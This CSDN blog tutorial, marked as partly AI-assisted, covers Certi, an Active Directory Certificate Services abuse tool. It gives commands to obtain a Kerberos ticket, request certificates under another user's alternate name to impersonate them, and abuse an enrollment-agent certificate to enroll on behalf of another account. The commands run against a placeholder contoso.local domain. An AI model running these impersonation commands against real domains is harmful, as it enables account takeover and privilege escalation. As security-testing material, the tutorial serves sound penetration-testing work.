Certi 项目使用教程

最新推荐文章于 2025-05-03 14:14:38 发布
最新推荐文章于 2025-05-03 14:14:38 发布
阅读量432 收藏 6
点赞数 3
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/gitblog_00098/article/details/139341035

Certi 项目使用教程

certi ADCS abuser 项目地址: https://gitcode.com/gh_mirrors/ce/certi

1. 项目介绍

Certi 是一个用于与 Active Directory 证书服务 (ADCS) 交互的工具。它允许用户请求证书并收集与证书相关的信息。Certi 是基于 Impacket 库开发的,特别感谢 @harmj0y 和 @tifkin_ 在 ADCS 方面的工作。

2. 项目快速启动

2.1 安装 Certi

首先,确保你已经安装了 Python 和 Git。然后,通过以下命令克隆并安装 Certi:

git clone https://github.com/zer1t0/certi.git
cd certi
pip install -r requirements.txt

2.2 请求证书

使用 Certi 请求证书的示例代码如下:

# 获取 TGT
getTGT.py 'contoso.local/Anakin:Vader1234'

# 设置 KRB5CCNAME 环境变量
export KRB5CCNAME=Anakin.ccache

# 请求证书
certi.py req 'contoso.local/Anakin@dc01.contoso.local' contoso-DC01-CA -k -n

3. 应用案例和最佳实践

3.1 请求带有替代名称的证书

在某些情况下,你可能需要请求一个带有替代名称的证书,以便模拟目标用户。以下是一个示例:

certi.py req 'contoso.local/Anakin@dc01.contoso.local' contoso-DC01-CA -k -n --alt-name han --template UserSAN

3.2 使用代理证书请求证书

如果你有权限使用代理证书,可以通过以下步骤请求另一个用户的证书:

# 请求代理证书
certi.py req 'contoso.local/Han@dc01.contoso.local' contoso-DC01-CA -k -n --template EnrollAgent

# 使用代理证书请求另一个用户的证书
certi.py req 'contoso.local/Han@dc01.contoso.local' contoso-DC01-CA -k -n --on-behalf anakin --enroll-cert Han.pfx --enroll-cert-pw admin --template EnrollWithAgent

4. 典型生态项目

Certi 通常与其他安全工具和框架一起使用,例如:

  • Impacket: 一个用于网络协议的 Python 库,Certi 基于此库开发。
  • BloodHound: 用于映射和分析 Active Directory 环境的工具。
  • CrackMapExec: 一个用于渗透测试的工具,可以与 Certi 结合使用来测试 ADCS 的安全性。

通过这些工具的结合使用,可以更全面地评估和提升 Active Directory 环境的安全性。

certi ADCS abuser 项目地址: https://gitcode.com/gh_mirrors/ce/certi

创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考

vim学习-vim框架解读&一键配置ide环境
cheng3100的博客
10-27 717
目录VIM介绍vim的效率vim的能力vim的结构组成 VIM介绍 vim是linux下的一个开源的文本编辑器,特点是全部操作通过命令行实现,也不需要图形界面,从而可以很方便地通过ssh等方式连接到服务器上修改文件。vim的配置有些复杂,对于不想麻烦的同学,请尝试使用我的一键式配置工具 vim的效率 这是一个经常容易引发争执的话题,对于实用主义者而言,认为vim的大量繁琐命令操作既不直观也容易忘...
Java使用openssl详解(openssl安装教程、openssl制作证书、java代码实现openssl、浏览器通过https访问后端)入门
qq_41630351的博客
08-28 6964
安装openssl 通过官网的下载源码编译或者直接通过exe文件直接下一步下一步安装完成,网上教程很多! openssl制作证书 先创建3个目录 certificate、service 、client 进入cmd cd到上面三个目录的父目录 1.创建私钥 : D:\IDEA\qqtxt>openssl genrsa -out certificate/ce-key.pem 1024 2.创建证书请求 : D:\IDEA\qqtxt>openssl req -new -out certificat
linux-Vim基于文本的UI框架
08-13
Vim基于文本的UI框架
一个vim框架的简单实现
weixin_30439131的博客
03-08 173
  vim有编辑器之神的美誉。   有一定的学习曲线,但是熟练之后真是让人爱不熟手啊。vim可以让人完全抛弃鼠标,所有操作全部通过命令实现,大大提高编码的效率。   废话不多说,下面我说一下我的实现:   1. vim3个模式:    一般模式,插入模式,以及命令模式。     一般模式:主要用于进行复制黏贴删除、定位光标等操作。     插入模式:进行编辑代码的模式...
分布式仿真中开源HLA/RTI框架CERTI编译所需的组件(Win32)介绍
最新发布
gitblog_06756的博客
05-03 660
分布式仿真中开源HLA/RTI框架CERTI编译所需的组件(Win32)介绍 【下载地址】分布式仿真中开源HLARTI框架CERTI编译所需的组件Win32介绍 CERTI是一个开源的分布式仿真框架,实现了HLA/RTI的核心功能,为用户提供了强大且灵活的仿真环境。本文档详细介绍了在Windows 10系统中使用Visu...
在Ubuntu上安装CERTI
falwat的专栏
05-11 889
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
编译CERTI
xiaofengwei的专栏
12-18 5094
今天有时间将CERTI编译安装成功。希望短期内可以将CERTI进行一下分析。要是能够完成仿真平台的原型开发,应该可以说是自己的一个进步和对自己这几年编程经验的一个总结。今天的经验是CERTI编译所需要的第三方软件不能安装到有空格的路径下,否则编译会不成功。
certi
03-30
综上所述,"certi" 可能是一个关于使用Django构建用户认证系统的实践项目教程,涵盖了用户注册、表单验证、登录功能以及相关的安全性、权限管理等关键知识点。通过学习和实践,开发者能够掌握构建安全、功能完善的...
Certi仿真1516版本封装应用实例教程
"certi"再次确认了与Certi软件的关联,"c++"表明这个项目或封装实例是使用C++编程语言开发的。版本标签"1516",尽管未被明确,可能指代了HLA标准的版本或者该项目所依赖的Certi软件库的版本。 压缩包子文件的文件...
VS2015编译与运行CERTI3.4教程
接着,使用VS2015创建一个Win32静态库项目,添加源文件进行编译。 - libxml2库:下载libxml2-2.9.8,解压并将`include\libxml`目录复制到`CERTI-Depends\3rd-party\include`。修改`libxml.h`文件,添加必要的宏定义...
HLA开源库CERTI
11-11
开发者可以通过阅读源码来理解HLA规范如何在实际项目中被实现,以及如何使用CERTI库来构建自己的HLA应用。 2. **配置文件**:这些文件用于设置和控制CERTI的行为,例如RTI的配置参数、网络设置等。理解和调整这些...
HLA开源库certi安装说明
06-10
用于开发复杂仿真系统的开源库,可以在此基础上进行二次开发,很好的库
certi:生成自己的SSL证书和私钥
04-23
证书 生成自己的SSL证书和私钥
CERTI编译指南
04-03
网络资料,已经根据资料成功实现编译,初学者可以参考使用
certi-CERTI-3_5_1.tar.gz_HLA_certi_certi 仿真_open rti_体系仿真
07-13
开源的HLA RTI 高层体系架构,用于仿真
certi运用,连接RTIG
03-16
certi运用,连接RTIG
CERTI 4.0.0 成功编译安装(Windows10+VS2022)
atrolwei的博客
02-27 2032
引言 CERTI是一个开源分布式仿真基础框架,是HLA/RTI的一种实现。其本身提供了源码和编译说明,但编译说明写于零几年,用的还是vs2005编译,比较老旧,另外很多地方写得不详细。笔者在编译过程中就遇到过很多问题,摸索很久,才终于实现了在Windows 10上使用Visual Studio 2022的顺利不报错编译安装,另外在这个过程中也摸索出了在Linux下的编译安装和Windows上使用MinGW编译安装。 由于在Linux下的编译安装之前已经写过,详见_下文_,本文主要讨论CERTI在Window
windows10 + vs2017 + CERTI3.5.1安装说明
happyls123的博客
04-09 1928
总体安装流程参考豆丁网《CERTI源码配置编译详细过程》(https://www.docin.com/p-466908899.html),但是安装过程中遇到了一些问题,下面将补充一下安装过程。 1. 准备工作 1.1 安装与windows10版本对应的SDK 首先查看windows10 SDK版本,控制面板->管理工具->系统信息->版本; 下载相应版本SDKhttp...
CERTI架构剖析
zsq306650083的专栏
04-19 4938
待整理... CERTI采用层次式结构模型 联邦管理 即管理联邦执行 第一个加入仿真的联邦成员可以删除联邦执行 联邦执行退出顺序:联邦成员,局部RTI上联邦执行与局部RTI,中心RTI上联邦执行 RTI根据FED文件生成全联邦都一至的各类数据列表: 联邦执行列表 记录联邦执行的ID值和联邦执行名 联邦成员列表 记录参与联邦执行的每个联邦成员的
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

曹俐莉

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值